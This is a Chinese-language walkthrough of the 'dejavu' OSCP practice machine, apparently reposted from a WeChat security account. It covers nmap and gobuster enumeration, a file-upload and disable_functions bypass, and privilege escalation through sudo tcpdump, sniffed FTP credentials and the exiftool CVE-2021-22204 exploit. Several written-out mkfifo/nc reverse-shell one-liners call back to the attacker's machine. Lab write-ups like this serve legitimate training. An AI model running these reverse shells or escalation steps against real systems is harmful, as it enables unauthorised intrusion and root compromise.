OSCP 靶场
靶场介绍
|
dejavu |
easy |
信息收集、漏洞挖掘、文件上传绕过、绕过disable_functions、tcpdump流量抓取&提权、exiftool 漏洞提权、CVE-2021-22204提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
└─# nmap -sV -A -p- -T4 192.168.1.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 09:52 EST
Nmap scan report for dejavu (192.168.1.111)
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
| 256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_ 256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:D9:04:86 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms dejavu (192.168.1.111)
目录扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.111 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.111
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.111/.php (Status: 403) [Size: 278]
http://192.168.1.111/.html (Status: 403) [Size: 278]
http://192.168.1.111/index.html (Status: 200) [Size: 10918]
http://192.168.1.111/info.php (Status: 200) [Size: 69958]权限获取
从info信息源码中获取隐藏目录
上传phtml后缀文件绕过文件限制,但是这里函数被禁用了。
我们使用蚁剑里面的插件绕过disable_functions 限制,获取使用如下脚本进行反弹shell绕过限制。
https://github.com/kriss-u/chankro-py3
为了方便操作我们使用如下命令反弹一个交互shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.103 8888 >/tmp/f
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键
stty raw -echo;fg
reset
权限提升
sudo -l 查看到reboert 用户可以免密码执行tcpdump 命令,我们查询gtfobins 可以找到对应的提权命令
www-data@dejavu:/tmp$
www-data@dejavu:/tmp$ sudo -l
Matching Defaults entries for www-data on dejavu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on dejavu:
(robert) NOPASSWD: /usr/sbin/tcpdump
COMMAND='nc 192.168.1.103 1212 -c /bin/bash'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo -u robert /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z robert反弹失败
上传pspy64 查看进程,发现每隔一段时间就会登录到 FTP 服务器。
我们使用tcpdump 监听ftp 流量,抓取到ftp 登录的密码
sudo -u robert tcpdump -i lo port ftp
或者
sudo -u robert /usr/sbin/tcpdump tcp port 21 -c 10 -w /tmp/tcp.txt -i lo
通过抓取到的密码可登录到ftp 和ssh
robert@dejavu:~$ sudo -l
Matching Defaults entries for robert on dejavu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User robert may run the following commands on dejavu:
(root) NOPASSWD: /usr/local/bin/exiftool
查看exiftool 版本为12.23,searchspolit 里面找到对应版本漏洞
exiftool -ver
或者
head -n 15 exiftool
python3 50911.py -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.103 8188 >/tmp/f'
sudo exiftool image.jpg 
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】dejavu
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论